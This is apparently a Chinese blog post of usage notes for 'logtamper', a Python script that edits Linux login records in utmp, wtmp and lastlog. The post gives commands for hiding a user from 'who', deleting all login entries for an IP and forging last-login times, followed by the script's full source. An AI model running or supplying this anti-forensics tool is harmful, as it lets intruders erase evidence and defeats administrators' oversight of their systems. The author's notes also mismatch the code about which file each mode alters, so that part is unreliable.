0%

logtamper使用

发表于 更新于 分类于 阅读次数:
本文字数: 4k 阅读时长 ≈ 4 分钟

2019年12月23日 下午6:12

untitled.py
2019年12月25日 下午2:53
注:

  1. 验证ubuntu是可以使用的,但必须要有sudo权限才可以执行
  2. 由于python2->python3需要修改两处源码:
    1. print()
    • python3中默认的字符串为Unicode格式,而struct的函数中需要传的参数必须为“utf-8”格式,因此需要在文件开头手动声明编码格式“# coding = unf-8”
  3. 结合tty 或 ps命令,可得到tty这个参数的值

2019年12月23日 下午6:12
logtamper
logtamper/logtamper.py at master · re4lity/logtamper · GitHub

python修改linux日志(logtamper.py) - 轻轻的烟雾 - 博客园

躲避管理员who查看

1
python logtamper.py -m 1 -u username -i 192.168.0.188

清除指定ip的登录日志:删除全部这个ip相关的

1
python logtamper.py -m 2 -u username -i 192.168.0.188
1
sudo python logtamper.py -m 2 -u czh -i :0

修改上次登录时间地点

1
python logtamper.py -m 3 -u username -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12
1
sudo python logtamper.py -m 3 -u czh -i 192.168.143.1 -t pts/1 -d 2014:05:28:10:11:12

这里对-m参数补充说明一下:

-m 操作的模式 固定值,3个可选【1/2/3】
分别是

  • 1:修改当前登陆用户。
    • 日志文件:_var_log/wtmp
    • 查看命令: who
  • 2:清除登陆日志。
    • 日志文件:_var_run/utmp
    • 查看命令:last | more
  • 3、不是清除,是修改覆盖上次的登陆信息,要修改的用户为-u后面的参数,改为后面 -i -t -d的信息。所以,例如,想改root用户,则-u root,-i -t -d随便输入。
    • 日志文件:_var_log/lastlog
    • 查看命令:lastlog
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# mail: cn.b4dboy@gmail.com

import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser

UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"

LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)

XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)

def getXtmp(filename, username, hostname):
    xtmp = ''
    try:
        fp = open(filename, 'rb')
        while True:
            bytes = fp.read(XTMP_STRUCT_SIZE)
            if not bytes:
                break

            data = struct.unpack(XTMP_STRUCT, bytes)
            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
            if (record[4] == username and record[5] == hostname):
                continue
            xtmp += bytes
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return xtmp

def modifyLast(filename, username, hostname, ttyname, strtime):
    try:
        p = getpwnam(username)
    except:
        showMessage('No such user.')

    timestamp = 0
    try:
        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
        timestamp = int(mktime(str2time))
    except:
        showMessage('Time format err.')

    data = struct.pack(LAST_STRUCT, timestamp, ttyname.encode("utf-8"), hostname.encode("utf-8"))
    try:
        fp = open(filename, 'wb')
        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
        fp.write(data)
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return True

def showMessage(msg):
    print(msg)
    exit(-1)

def saveFile(filename, contents):
    try:
        fp = open(filename, 'w+b')
        fp.write(contents)
    except IOError as e:
        showMessage(e)
    finally:
        fp.close()

if __name__ == '__main__':
    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \
                    logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
    parser = OptionParser(usage=usage)
    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
    parser.add_option('-t', '--ttyname', dest='TTYNAME')
    parser.add_option('-f', '--filename', dest='FILENAME')
    parser.add_option('-u', '--username', dest='USERNAME')
    parser.add_option('-i', '--hostname', dest='HOSTNAME')
    parser.add_option('-d', '--dateline', dest='DATELINE')
    (options, args) = parser.parse_args()

    if len(args) < 3:
        if options.MODE == '1':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:
                options.FILENAME = UTMPFILE

            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)

        elif options.MODE == '2':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:
                options.FILENAME = WTMPFILE

            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)

        elif options.MODE == '3':
            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:
                options.FILENAME = LASTLOGFILE

            # tamper
            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)

        else:
            parser.print_help()